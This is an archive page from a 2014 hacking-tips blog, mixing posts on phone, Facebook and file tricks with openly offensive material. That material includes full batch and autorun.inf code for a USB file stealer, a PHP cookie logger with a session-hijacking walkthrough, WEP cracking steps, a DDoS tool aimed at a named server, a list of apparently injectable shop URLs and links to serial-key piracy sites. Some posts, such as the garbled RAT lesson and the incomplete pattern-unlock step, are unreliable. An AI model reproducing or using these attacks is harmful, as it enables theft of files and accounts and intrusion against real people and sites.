Saturday, December 13, 2014
http://www.fakenamegenerator.com/
11:38 PM
| Posted by
Unknown
|
FREE DOWNLOAD E-BOOKS
6:33 AM
| Posted by
Unknown
|
FREE DOWNLOAD E-BOOKS▐ ▬▬▬ - Linux Shell Scripting Cookbook, 2nd Edition DOWNLOAD LINK [ PDF ]: http://adf.ly/qSh4V READ MORE ABOUT THIS BOOK: http://www.backtrack-pages.com/…/linux-shell-scripting-cook… - Kali Linux Cookbook DOWNLOAD LINK [ PDF ]: http://adf.ly/qSh4W READ MORE ABOUT THIS BOOK: http://www.backtrack-pages.com/…/06/kali-linux-cookbook.html - Web Penetration Testing with Kali Linux DOWNLOAD E-BOOK [ PDF ]: http://adf.ly/qSh4X READ MORE ABOUT THIS BOOK: http://www.backtrack-pages.com/…/web-application-obfuscatio… - Web Application Obfuscation DOWNLOAD E-BOOK [ PDF ]: http://adf.ly/qSh4Y READ MORE ABOUT THIS BOOK: http://www.backtrack-pages.com/…/web-application-obfuscatio… - Network Security Hacks, 2nd Edition DOWNLOAD E-BOOK [ PDF ]: http://adf.ly/qSh4Z READ MORE ABOUT THIS BOOK: http://www.backtrack-pages.com/…/network-security-hacks-2nd… - Inside Cyber Warfare: Mapping the Cyber Underworld READ MORE ABOUT THIS BOOK: http://www.backtrack-pages.com/…/inside-cyber-warfare-mappi… DOWNLOAD E-BOOK [ PDF ]: http://adf.ly/qSh4a - Private Cloud Computing: Consolidation, Virtualization, and Service-Oriented Infrastructure DOWNLOAD E-BOOK [ PDF ]: http://adf.ly/qSh4b READ MORE ABOUT THIS BOOK: http://www.backtrack-pages.com/…/private-cloud-computing-co… - Low Tech Hacking: Street Smarts for Security Professionals DOWNLOAD E-BOOK [ PDF ]: http://adf.ly/qSh4c READ MORE ABOUT THIS BOOK: http://www.backtrack-pages.com/…/low-tech-hacking-street-sm… - Access Denied: The Practice and Policy of Global Internet Filterin DOWNLOAD E-BOOK [ PDF ]: http://adf.ly/qSh4d READ MORE ABOUT THIS BOOK: http://www.backtrack-pages.com/…/access-denied-practice-and… *** FREE DOWNLOAD AND READ MORE NEW E-BOOKS: *** http://www.backtrack-pages.com/search/label/E-Books
http://youtu.be/pHJSEc3zU5E
6:09 AM
| Posted by
Unknown
|
How To Trace Your Facebook Profile Visitors
2:19 AM
| Posted by
Unknown
|
How To Trace Your Facebook Profile Visitors Now here we found who recently visited your profile. Follow below steps for get to know your FB recent visitors. Step 1) Go to your Facebook Profile Page. Step 2) Now Press Ctrl + U from your keyboard for see source code of your profile page. Step 3) Now press Ctrl + F from your keyboard to open search box. Step 4) Now search this code {"list": Step 5) You find some Facebook Profile Ids Step 6) There are some Facebook Profile Ids of your friends who visited recently. Step 7) The first one ID's are showing visits the most number of time. Step 8) Now if your want to findout, Open a new tab Enter below link : www.facebook.com/Facebook Profile Id For Example : www.facebook.com/100001257992988 Enjoy The Trick..
Wednesday, December 10, 2014
Steps to Unlock Android pattern lock:
11:37 PM
| Posted by
Unknown
|
Steps to Unlock Android pattern lock: 1.Enabling USB Debugging: For this process to be a success, the device which you wish to unlock should be enabled with USB Debugging. For this go to Settings->Development- >USB debugging and enable it. 2. Connect the device to the computer: Now after making sure that the device is USB Debugging enabled, Connect it to the computer. Go to start and open CMD. Type the following code very carefully. adb shell Now press enter 3. Reboot: After giving the commands in the CMD, restart or reboot the android device. Now give any pattern and your device should be unlocked. If you any doubts in the above process, please feel free to contact us.
president to write a computer program
9:59 AM
| Posted by
Unknown
|
Obama becomes the first US president to write a computer program <<<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> President Barack Obama, to kick off the annual Computer Science Education Week, has become the first US president (at least as far as we know) to write a computer program. While this might not seem like a big deal, this will be seen as a glowing endorsement for the code literacy movement — a campaign that, for the last couple of years, has been extolling the virtues of teaching kids how to program. The question is, however, will learning how to program give the Coder in Chief (sorry) the necessary mental faculties — the fabled coder mindset — to corral a bitterly partisan Congress into ratifying some useful laws? Is fixing US politics just a matter of a well-placed for-next loop? As always, ExtremeTech will tackle one of the trickiest issues facing society head-on. Yesterday, at an event on the White House complex in Washington, President Obama sat down with middle-schooler Adrianna Mitchell and finished a very simple computer program. He made Elsa, from the film Frozen, walk in a straight line. Most reports say that Obama wrote a single line of JavaScript, but I think he did even less than that. From the video (below) it sounds like he’s doing stage three of the Code.org Frozen tutorial, where he simply has to drag a block (which represents a line of JavaScript code) into the “code editor.” In the interests of journalistic integrity, I actually completed the entire Frozen tutorial and didn’t have to write a single line of code. It’s possible that the Coder in Chief was given a special, extra-hard version of the tutorial — because, well, he’s the leader of the free world! — but I doubt it somehow. I should also point out that it’s entirely possible that Bill Clinton, or indeed any of the recent US presidents, might have also dabbled in programming in their spare time. Anyway, putting my cynicism aside for a moment, the concept behind Obama’s first program is a good one. Last year Obama gave a rousing speech (below) about the value of learning to code and computer science in general — and now he’s actually doing it. If the POTUS can take the time to code, and perhaps to develop a more logical, rational mindset as a result, then so can the nation’s kids.
Best Free Sites to find Any Softwares Serial Key 1. www.youserials.com 2. www.unlimitedserials.com 3. www.superserials.com 4. www.serialportal.com 5. www.keygenguru.com 6. www.smartserials.com 7. www.appleserialnumberinfo.com 8. www.serialnumber.in 9. www.keygen.us 10. www.gamecopyworld.com
8:56 AM
| Posted by
Unknown
|
Best Free Sites to find Any Softwares Serial Key 1. www.youserials.com 2. www.unlimitedserials.com 3. www.superserials.com 4. www.serialportal.com 5. www.keygenguru.com 6. www.smartserials.com 7. www.appleserialnumberinfo.com 8. www.serialnumber.in 9. www.keygen.us 10. www.gamecopyworld.com
Make an Autorun Virus that Steals files as soon as its plugged into a computer.
5:16 AM
| Posted by
Unknown
|
Make an Autorun Virus that Steals files as soon as its plugged into a computer. This is no Harmful to the other Person's Computer at all. So first Plug in Your USB then Navigate Your Way to it. Now ; Copy and Paste this Batch Code that will Steal the files if you are using Windows Xp ; Use This Batch Code. Code : ******** @echo off :CHECK if not exist "%&&&&%\Copied_files" md "%&&&&% \Copied_files" if exist "%systemdrive%\Documents and Settings" goto COPIER goto ERROR :COPIER if not exist "%&&&&%\Copied_files\%computername %" md "%&&&&%\Copied_files\%computername%" if not exist "%&&&&%\Copied_files\%computername %\VIDEOS" md "%&&&&%\Copied_files\%computer name%\VIDEOS" if not exist "%&&&&%\Copied_files\%computername %\PICTURES" md "%&&&&%\Copied_files\%computername% \PICTURES" if not exist "%&&&&%\Copied_files\%computername %\MUSIC" md "%&&&&%\Copied_files\%computer name%\MUSIC" if not exist "%&&&&%\Copied_files\%computername %\DOWNLOADS" md "%&&&&%\Copied_files\%computername% \DOWNLOADS" copy /y "%userprofile%\My Documents\*.*" "%&&&& %\Copied_files\%computername%" copy /y "%userprofile%\My Documents\My Videos" "%&&&&%\Copied_files\%computername%\VIDEOS" copy /y "%userprofile%\My Documents\My Music" "%&&&&%\Copied_files\%computername%\MUSIC" copy /y "%userprofile%\My Documents\My Pictures" "%&&&&%\Copied_files\%computername% \PICTURES" copy /y "%userprofile%\My Documents\Downloads" "%&&&&%\Copied_files\%computername% \DOWNLOADS" MSG %username% "DONE!" exit :ERROR exit Now if You are Using Windows Vista ; Then Use This Batch Code. Code : ******** @echo off :CHECK if not exist “%&&&&%\Copied_files” md “%&&&&% \Copied_files” if exist “%systemdrive%\files” goto COPIER7 goto ERROR :COPIER7 if not exist “%&&&&%\Copied_files\%computername %” md “%&&&&%\Copied_files\%computername%” if not exist “%&&&&%\Copied_files\%computername %\VIDEOS” md “%&&&&%\Copied_files\%computer name%\VIDEOS” if not exist “%&&&&%\Copied_files\%computername %\PICTURES” md “%&&&&%\Copied_files\%computername% \PICTURES” if not exist “%&&&&%\Copied_files\%computername %\MUSIC” md “%&&&&%\Copied_files\%computer name%\MUSIC” if not exist “%&&&&%\Copied_files\%computername %\DOWNLOADS” md “%&&&&%\Copied_files\%computername% \DOWNLOADS” copy /y “%userprofile%\Documents\*.*” “%&&&&% \Copied_files\%computername%” copy /y “%userprofile%\Videos” “%&&&&%\Copied_ files\%computername%\VIDEOS” copy /y “%userprofile%\Music” “%&&&&%\Copied_ files\%computername%\MUSIC” copy /y “%userprofile%\Pictures” “%&&&&%\Copied_ files\%computername%\PICTURES” copy /y “%userprofile%\Downloads” “%&&&&% \Copied_files\%computername%\DOWNLOADS” MSG %username% “DONE!” exit :ERROR exit Now Replace &&&& with the name of your USB ; For example my USB's Name is "FiduHacker" Then Save it as FIDUHACKER.BAT or Whatever you Want. How this Batch file works is that it uses the MD Command or the Make Directory Command to Make the Copied_files folder and the files inside it. Then it Navigates its way to the Selected Folders and Pastes Them There. Now to make this file Autorun when we plug it. Now make another .txt file. Open this file & Paste this Code inside. Code : ******** [autorun] Open=&&&&.bat Action=File Copier So now replace the &&&& with Whatever You've Saved the Batch file as. Now Save it as autorun.inf Now Take Your USB Out and Plug it back in and the files will be Copied. if the files are not Automatically Copied, there will be an interface with option like "play with music player" and "read only" scroll down and u will find File copier
Monday, December 8, 2014
SQL
6:43 AM
| Posted by
Unknown
|
SQL #BY_Ibrahim_allan http://www.mbk-center.co.th/en/floorplan/shop.php?id=353 http://www.mynkmall.com/shop.php?id=2 http://www.karnaticlabrecords.com/cart.php?id=88 http://www.osaka-info.jp/osp/en/facility/shop.php?id=11 http://www.totalbhakti.com/shop.php?cid=34 http://www.oaxis.com/shop/product_detail.php?id=11 http://armorysq.org/main/shopping.php?id=87 http://www.bellasamui.com/koh-samui-shopping.php?id=8 http://www.antiquesincanada.com/shop.php?myID=496 http://www.mbtagifts.com/shop.php?c=4 http://www.slightergolf.com/products/shop.php?c=misc&id=8 http://teamgear.us/store.php?id=1 http://www.kidswithfoodallergies.org/resourcespre.php?id=1 http://www.invitatie.ro/shop.php?id =3 http://www.bs-sox.com/shop.php?id=4 http://www.kajakshop.hu/shop.php?id=49 http://www.ipicgroup.com/shopping_centre.php?id=1 http://www.hihitown.com/shop.php?id=187
AngryIPScanner is a very fast IP address
2:57 AM
| Posted by
Unknown
|
#AngryIPScanner is a very fast IP address and port scanner. It can scan IP addresses in any range as well as any their ports. It is cross-platform and lightweight. Not requiring any installations, it can be freely copied and used anywhere. Angry IP scanner simply pings each IP address to check if it’s alive, then optionally it is resolving its hostname, determines the MAC address, scans ports, etc. The amount of gathered data about each host can be extended with plugins. It also has additional features, like NetBIOS information (computer name, workgroup name, and currently logged in Windows user), favorite IP address ranges, web server detection, customizable openers, etc. Scanning results can be saved to CSV, TXT, XML or IP-Port list files. With help of plugins, Angry IP Scanner can gather any information about scanned IPs. Anybody who can write Java code is able to write plugins and extend functionality of Angry IP Scanner. In order to increase scanning speed, it uses multithreaded approach: a separate scanning thread is created for each scanned IP address. The full source code is available, see the download page. http://angryip.org/download
CREATE A COOKIE LOGGER TO HACK ANY ACCOUNT
2:46 AM
| Posted by
Unknown
|
CREATE A COOKIE LOGGER TO HACK ANY ACCOUNT. BY #THE_HJ A Cookie Logger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim. Today I am going to show How to make your own Cookie Logger…Hope you will enjoy Reading it … Step 1: Copy & Save the notepad file from below and Rename it as Fun.gifStep 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php: $filename = “logfile.txt”; if (isset($_GET["cookie"])) { if (!$handle = fopen($filename, ‘a’)) { echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } else { if (fwrite($handle, “rn” . $_GET["cookie"]) === FALSE) { echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } } echo “Temporary Server Error,Sorry for the inconvenience.”; fclose($handle); exit; } echo “Temporary Server Error,Sorry for the inconvenience.”; exit; ?> Step 3: Create a new Notepad File and Save it as logfile.txt Step 4: Upload this file to your server cookielogger.php -> http://www.yoursite.com/cookielogger.php logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777) fun.gif -> http://www.yoursite.com/fun.gif If you don’t have any Website then you can use the following Website to get a Free Website which has php support : http://0fees.net/ Step 5: Go to the victim forum and insert this code in the signature or a post :
Step 6: When the victim see the post he view the image u uploaded but when he click the image he has a Temporary Error and you will get his cookie in log.txt . The Cookie Would Look as Follows: phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9 Step 7: To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor. Step 8: Goto the Website whose Account you have just hacked and You will find that you are logged in as the Victim and now you can change the victim’s account information. Note : Make Sure that from Step 6 to 8 the Victim should be Online because you are actually Hijacking the Victim’s Session So if the Victim clicks on Logout you will also Logout automatically but once you have changed the password then you can again login with the new password and the victim would not be able to login. BY #THE_HJ
How to convert Facebook Profile To a Facebook fan Page
2:43 AM
| Posted by
Unknown
|
How to convert Facebook Profile To a Facebook fan Page Hello readers , I have an excellent new trick for converting your facebook profile to a facebook fan page.But before converting you profile to a page i want you to be aware of few things- When You covert your your Profile to a Page all you friends will be automatically added as people who like your page. Only your photos will be transfered to the Page rest all the other contents will be deleted,so be sure to save all the important contents before your migration. Last but not least once you convert you profile to a page it will be permanent and you will not be able to get back your profile. So be sure before converting your profile and I will not be responsible for the loss of your profile. Click here to convert your Facebook profile to a Facebook fan Page https:// www.facebook.com /pages/ create.php?migra te
Sunday, December 7, 2014
How to Change /Restore IMEI no on Android phones and tablets
10:46 PM
| Posted by
Unknown
|
How to Change /Restore IMEI no on Android phones and tablets. BY #THE_HJ In case your IMEI no gets changed or you get an error saying Invalid IMEI no. Then there is no need to panic, you can easily get your IMEI no back. This is very rare error that rarely happens when installing a customized ROM. Before you begin you need to note down the IMEI number. There will be 2 IMEI number in case of a Dual Sim handset. You can find the IMEI number on the box pack and/or mentioned in the Battery Compartment. 1) Open the Dialer and type *#*#3646633#*#* you will enter the engineering mode. 2) Then swipe left to connectivity. In connectivity click the CDS information option and tap radio information and then tap phone 1. 3)Now enter the command AT+EGMR=1,7,THE-FIRST-IMEI-NUMBER And press enter. For second SIM tap phone 2 and type this command AT+EGMR=1,10,THE-SECOND-IMEI-NUMBER And press enter. If *#*#3646633#*#* does not work and if you are using a MediaTek powered handset you can download the utility called MTK Engineering Mode for free from Google Play, it will do the same
Retrieve Deleted Facebook Messages,
7:24 AM
| Posted by
Unknown
|
Retrieve Deleted Facebook Messages,Photosand Videos: Step 1: First of all,You will have to Click here to open Facebook General account Settings. Step 2: Once you open your general settings, you will see Download a Copy of your Facebook Data, So click on it to. Step 3: On the Next page you will see a Download Archive Button, Click on it and you will be prompt to enter your Password to Continue, This is a Security Step by Facebook. Step 4: After entering your Facebook Password, Click on Submit, On the next screen you will be shown that the download link for your data will be sent to your email id which you used to create your facebook account. Step 5: Wait for Few Minutes, check your mail. You will see a mail from facebook in your Inbox with Downloading link ready for you to download all your data. Step 6: Now After downloading the file. Unzip it and open the folder where you will find your messages, photos, vidoes. Pokes, Friend list etc. The Files will be in .html format so you will have to double click on the file and select your Favourite Browser to open the file, the File will open up in your browser where you will have access to all your data.
HP DDOSER
1:51 AM
| Posted by
Unknown
|
I stood up all night coding this 4 you all well finally here you all, HP DDOSER to take down HP ------------------------------------------------ It is easy to use and have a good day Spread the tool if you want and just a reminder it only targets HP if they change there site then that other site is down, I am tired of people saying Hidden project is the most secure private server well now it's not now it is time hp meets there doom! [!] https://www.mediafire.com/?2bmqg3r80qfll1z [!] All the requirements are in the folder, and it is only 23.11MB It takes HP down fast and ENJOYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY
Penetrate setups first lesson:
1:14 AM
| Posted by
Unknown
|
Penetrate setups first lesson: Open course in Port Router http://www.youtube.com/watch?v=AVQtdnWvdmw second lesson in open Port firewall http://www.youtube.com/watch?v=s7FqRDCLM2M third lesson: Date explain the site no-ip and worked Host http://www.youtube.com/watch?v=-Bv7gNpT8MU Lesson Four: Explaining the composition surfer Spynet and install victims http://www.youtube.com/watch?v=48PvwtozGNk was completed successfully penetrate setups Alrat programs cycle! Introduction of Oscar devastating! ________________________________________________ Oscar devastating speaks :: {protection from outside penetration} ________________________________________________ Besoa guys Ehna Hnakhadd subject of the first Ahan be all understand what the outside penetration? Contact is to Bigilk without your knowledge uniforms PAC Trac - of course in the external contacts to your device, but I'm very much languagesTo contact Kharji hacker means - first need Biatmd them to Bichterqk Ballbeck 1-Trac your IP Btaa victim 2-Albortat him open 3-open gaps him _____________________________________________ remains first need Huntalmha Kasai change your IP Btaa Ahan device to limit Legge Ichterqk Hillaqy your IP variable, and then, the failure of a break !!!!! Led program change your IP http://www.freesafeip.com/ar/pro affection from the main site Ahan nobody says Melgmin and Mnlen honorable and written off very simple terracing and what Maak chose the country to Aaozha and press opens the CHANGE IP Htlaqy not change your IP Keda have been your IP change ________________________________________________ step Altanih and the third one is very Mat excuse me I Ehglkua programs and Antoa downloaded, knowingly Ahan in Bostadt I got the download links for the programs people Talat said the bomb in his name bugoff program 1:10 de Baiqvl some gaps Almanmma program in the device, of course de non terracing Btenslh and open it and Htlaqy Two words enable and Htlaqy violin disable if received on the North word disable press them up to what remains right the whole enable Htlaqy 3 gaps Mbaagaflosh Maak countries Mbetagaflosh Ptoa important sources in Minfc Taatagafl device ________________________________________________ most important Port touch in the victim's Bacon device 445 Da followed Meta Sploat if open when the victim Bashl Hajaat Puppets Ui penetration P Ehna Henstkhaddm program Windows Worms Doors Cleaner 1.4.1 de Houdrtk Btenslh and Tighe at Alanh written to the port 445 and press the close ________________________________________________ Keda Congratulations you remain protect your computer from outside intrusion and if Jpkoa Thread landed your vote -._ . Oscar-destructive -._.- ________________________________________________ Oscar devastating speaks :: {protection from penetration by surfer} ________________________________________________ Soi guys Ehna Hnakhadd subject of the first Ahan have all understand what is to break through surfer - is a breakthrough that takes place to Almchterv Abatlk surfer and you do not know afford As soon as you open it give him a ride eloquent your device or you descend a file from the net open it is breached give him a ride Report from your ________________________________________________ Now you oh Jad'aan stayed protection from Alrat programs to come on programs to Petrf surfer on the victim's computer, of course the word {server = Patch} ________________________________________________ course protection of software de takes place very simple Antoa knowing that with Oscar. there is no need for her tough Ehna Henkhv mining surfer to have sold the penetrator and violin Hensolh Now you you what Ptfath server on your machine takes place needs Kteer Ui and Bacon where damage very much the victim as possible, for example ________________________________________________ 1. opens Alcamarl have friendly Protect yourself omitted you degrade any need Soda, if you have a camera Ashan breached Mishvkh ________________________________________________ 2-possible opens moxibustion Lugar - de remained Basgel to Baketbh moxibustion Bord friendly way to guaranteed billion Maiya to steal any Emil because of course you what Btakhtriq victim device in any Rat Bacon program Key to drag which you need Ptketbha on the keyboard Ptouselh is in keda file and moxibustion Luger takes place protection of it is very simple program written off and Cebu Mtamelc any need Tani named {KeyScrambler} course, excuse me, I Mbenzch links Ashan nobody says mg but of course, the program is very simple Staboa and Cebu _______________________________________________ 3 -memkn breached Arflk virus affection of course takes place through an executive extension Bacon Aldous bat affection file takes place protection from him in a way Vulture little sense I Halmk close the cmd and open in time to you wants to use ups Ahan protect yourself from the virus to Hervaholk at any time Ptfath start run gpedit.msc Administrative Templates i Ptdguet the word de Htlaqy Zartlk Qaama on the right Htakhtar system Htdguet them twice Hazarlk Qaama Htkhar word prevent access to the command prompt Htdguet them twice Htzarlk Qaama Htlaekayaa parameter word Not Configured you Htalm word Enabled and press ok course keda the cmd Httagafl Ahan open it stayed the same steps Htchil word Enabled and derogatory word Not Configured pressing Inter _______________________________________________ In Tanih characteristics of a very, very but Malhash inevitable if the server entered your device in you stayed needed secured yourself before the server admits originally in such a way in a very, very strong program too makes an Verual device frankly an excellent program and I myself Bstamlh mesh engages extension exe harmful files violin pygmy device and Baiqvl in some of the gaps and Baiqvl some Albortat course, the program is very, very simple written off and Sepah but TrustPort Internet Security _______________________________________________ Ok Now you Ehna cowardly file and we went Jain Adpsona and Fathnah and server device descended course in Bekshv communications program to exist in the device to come Albortat related device Tayyip course like what Colt before this 1.albefrost [bifrost] Allport granulated basic is Port 81 2.sbaa Net (spy net) Allport granulator is 288 3.aldark Comet [dark commet] Allport is granulated 1604 4.alx Trim [xtream rat] Allport granulator is 82 5.almita Spolit [met a sploit] Allport is granulated 4444 6.alngerat [njrat] 1177 Allport granulator is 7.allbeck Trac [backtrack] 445 Allport granulator is if received Port of Mtousel device States through the start run cmd netstat -n Talat column if received in the latest figures number of the names of the programs de know that your computer hacker In Bazaarham program of course, named X-NetStat Professional Bteja when Allport programs de pressing Kalak right and press Keller Port Hathompsh Alservrmen ________________________________________________ device In Tanih way through that if the server machine down and you wants to erase possible erase manual way de of stomping type dir patch and then press ENTER If your device is properly the result will be like this volume in drive c has no label Volume serial number is Directory of c: \ windows File not found if you find the patch delete it in the following way: C: \ Windows \ delete patch ________________________________________________ In Tanih way from the system registry file Registry 1- Click on Start 2. Write it in operation run box Next Regedit, and then Ok then open the following folders in the following order: 1- HKEY_LOCAL_MACHINE 2- SOFTWARE 3- MICROSOFT 4- WINDOWS 5- CURRENT VERSION 6- RUN RUN if a file opened you will open the system registry window and you will find at the top of the north filenames working with the Startup menu in the top right hand side of files addresses so: names __________ data if you find a file does not offset address in the DATA or appeared in front of a small arrow so
Friday, December 5, 2014
A hacker in tips 1-penetrating devices http://www.youtube.com/channel/UCuTxoPI4nyvsqMlz0C0L5eQ?spfreload=10
1:04 AM
| Posted by
Unknown
|
A hacker in tips 1-penetrating devices (Pc Hacking) from here start your journey in breakthroughs, if you can figure out how to break through and managed to hack it now possible proposals tend to penetrate the sites 2-hacked websites (Website Hacking) and this way learn from your experience and your perseverance, not easy, but not impossible to learn. 3. run a firewall on the computer and the personal examples of the ZoneAlarm firewalls and beware of malware or so-called malware to your computer. Insulate them so as not to cause you any harm 4. gradual start is. .. For example: matbeda bekhtrak sites before hardware.. Don't discover gaps and you loophole untapped ready discoverer.. Penetrate the site protect weak before strong sites.. Etc., is gradual, the starting point is follow us on YouTube http://www.youtube.com/channel/UCuTxoPI4nyvsqMlz0C0L5eQ?spfreload=10
Wednesday, December 3, 2014
How To Hack Wifi Password with Android Hack wifi using android Method 1 of 2
11:14 PM
| Posted by
Unknown
|
How To Hack Wifi Password with Android Hack wifi using android Method 1 of 2 : Hacking WEP Routers 1Root a compatible device.Not every Android phone or tablet will be able to crack a WPS PIN. The device must have a Broadcom bcm4329 or bcm4330 wireless chipset, and must be rooted. The Cyanogen ROM will provide the best chance of success. Some of the known supported devices include: *.Nexus 7 *.Galaxy S1/S2 *.Nexus One *.Desire HD 2Download and install bcmon.This tool enables Monitor Mode on your Broadcom chipset, which is essential for being able to crack the PIN. The bcmon APK file is available for free from the bcmon page on the Google Code website. *.To install an APK file, you will need to allow installation from unknown sources in your Security menu. Step 2 of this articlegoes into more detail. 3Run bcmon.After installing the APK file, run the app. If prompted, install the firmware and tools. Tap the "Enable Monitor Mode" option. If the app crashes, open it and try again. If it fails for a third time, your device is most likely not supported. *.Your device must be rooted in order to run bcmon. 4Tap "Run bcmon terminal".This will launch a terminal similar to most Linux terminals.Typeairodump-ngand tap the Enter button. AIrdump will load, and you will be taken to the command prompt again. Typeairodump-ng wlan0and tap the Enter button. 5Note the MAC address that appears.This is the MAC address for the router. Make sure that you have the right one if there are multiple routers listed. Jot this MAC address down. *.Also note the Channel that the access point is broadcasting on. 6Start scanning the channel.You will need to collect information from the access point for several hours before you can attempt to crack the password. Typeairodump-ng -cchannel#--bssidMAC address-w output ath0and tap Enter. Airodump will begin scanning. You can leave the device for a while as it scans for information. Be sure to plug it in if you are running low on battery. *.Keep scanning until you reach at least 20,000-30,000 packets. 7Crack the password.Once you have a suitable number of packets, you can start attempting to crack the password . Return to the terminal and typeaircrack-ng output*.capand tap Enter. 8Note the hexadecimal password when finished.After the cracking process is complete (which could take several hours), the messageKEY FOUND!will appear, followed by the key in hexadecimal form. Make sure that "Probability" is 100% or the key will not work. [2] *.When you enter the key, enter it without the ":". For example, if the key was 12:34:56:78:90, you would enter1234567890. Method 2 of 2: Using Osmino Wi-Fi 1Open Google Play.Osmino can be downloaded for free from the Play Store. This app will scan the available access points and let you connect to ones that have had their passwords shared. This app doesn't do any hacking, but you can benefit from passwords that have been hacked by someone else. See this guidefor more detailed instructions for installing apps. *.Search “Osmino Free Wi-Fi” and install the first search result. 2Find out all the available networks in your location.This application will track down all the nearby Wi-Fi hotspots, and will also tell you whether or not you can connect with that network. 3Select a Wi-Fi network.You will see that some Wi-Fi Networks are displayed with either green or red icons. Select one whose icon is green. The one which is shown in green will be either the “Free Open Network” or the one which password has been made available to them. The developer has created a community through which users can provide passwords to each other. *.Be wary joining password-protected networks without permission, as this can be illegal
Ethical Hacking Course Part-10 Introductions to Social Engineering Attacks http://youtu.be/uf9fv1eu-LU
11:07 PM
| Posted by
Unknown
|
Ethical Hacking Course Part-10 Introductions to Social Engineering Attacks Like & Share #Hacking #SET #SocialEngineeringToolkit #SETToolkit #SocialEngineeringAttack #OffensiveSecurity #KaliLinuxTools #PenetrationTesting #EthicalHacking #HackingClass #HackingCourse #KaliLinux #KaliLinuxClass #KaliLinuxCourse #Pentest #Backtrack #BacktrackLinux #Hack #EthicalHackingCourse #BhargavTandel #WebPenetrationTesting #WebsitePentest #WebsitePenetrationTesting #CEH #CEHv8 #LPT http://youtu.be/uf9fv1eu-LU
How to Easily Recover Deleted files from Windows PC and Memory Cards
10:59 PM
| Posted by
Unknown
|
How to Easily Recover Deleted files from Windows PC and Memory Cards Sometimes we accidentally delete some files in our Computer and Android Mobile. So here In this post I tell you How can you recover deleted files from Computer Drives, USB Pendrive and Memory Cards. With this method you get back all of your data. If you Learn How to recover your deleted data you can easily recover your movies, songs and Pictures. Recuva Recovery Software Recuva is free software by Piriform Company. With Recuva you can easily recover your deleted files from computer and all storage medias. Recuva is best free recover delete file software for Windows and Mac. How You Recover Deleted Files from Recuva tools 1 Download Recuva tool from here- http://www.filehippo.com/download_recuva 2. Install and run the application. 3. Choose the specific file and click on Next button. recover deleted files from recuva software 4. After that select the location of drive or folder, where you want search. 5. And after that click on "Next" Button and Enable deep scan if u want to scan deeply and click on "Start" button. 6. Now check the file which you want to recover and click on "Recover" button. 7. Now time to save the file, first choose the location of path or folder where you want to save the file after that click "OK" button. With Recuva you can easily recover files from Format SD Memory Card. This is one of the best for recovering deleted on any storage devices.
How To Hide Media Files from Android Phone's Gallery
10:22 AM
| Posted by
Unknown
|
How To Hide Media Files from Android Phone's Gallery. BY #THE_HJ 1.Open your favorite file manager, such as Astro File Manager, ES File Explorer, and E-plore File Manager. If you don’t have one, you can download it for free at Google Play Store. 2.Find the specific folder (or album) that you want to be hidden from your android phone’s gallery. 3.Tap rename and put a .(dot) in front of the folder name (with no spaces). For example, .nomedia. Press OK and done. Your album or folder is now hidden and will not show up on your gallery. To show it up again, simply remove that dot to make it back to normal. You can view the hidden files in the file manager, make sure to check the ‘Show hidden files' in the settings menu BY #THE_HJ
In this post i will teach a simple trick or browser feature
10:11 AM
| Posted by
Unknown
|
In this post i will teach a simple trick or browser feature that let you convert any web page into PSD file format, which might help you to read your favourite articles offline. So lets get started. How To Save Web Page To PDF File ? 1. Open the Google Chrome Browser on your PC or MAC 2. Then go to the web page that you want to convert as a PDF. 3. Now press Ctrl+P on Windows PC or Command+P if you are on a Mac to Open the the Print dialog on Chrome Browser. 4. Now Change the destination to “Save As PDF” and hit the save button. 5. The current web page will instantly be downloaded as a PDF document.
Android Hacking tool Hack Code:
9:58 AM
| Posted by
Unknown
|
Android Hacking tool Hack Code: The hacker's Toolbox is an application for penetration tester, Ethical hackers, IT administrator and Cyber security professional to perform different tasks like reconnaissance, scanning performing exploits etc. Download Link : https://play.google.com/store/apps/details…
Refer your friends to Goibibo app and earn 100 Rs per referral
9:53 AM
| Posted by
Unknown
|
Refer your friends to Goibibo app and earn 100 Rs per referral . How to refer and earn:- To refer and earn just download the app from here- https://play.google.com/store/apps/details?id=com.goibibo open it and initiate your signup, sign up using the coupon GC6A248 to get 1000 Rs go cash, verify your mobile number, then click menu > refer and earn, share your referral code with friends and earn 100 Rs go cash per referral.
Tuesday, December 2, 2014
How you Earn 50$ Daily from Url Shortning
4:47 AM
| Posted by
Unknown
|
How you Earn 50$ Daily from Url Shortning http://papuhackers.blogspot.com/p/how-you-earn-50-daily-fro… HOW TO HACK WIFI PASSWORD EASY TRICK http://papuhackers.blogspot.com/p/how-to-hack-wifi-password… How to Change Window 7 and 8 User Password without Knowing Old Password http://papuhackers.blogspot.com/p/how-to-change-window-7-an… http://papuhackers.blogspot.com/
http://worldwideprogramers.blogspot.in/2014/10/how-to-hack-ebay-account.html
4:32 AM
| Posted by
Unknown
|
http://worldwideprogramers.blogspot.in/2014/10/how-to-hack-ebay-account.html
Security Tips By World's Most Wanted Hacker Kevin
4:31 AM
| Posted by
Unknown
|
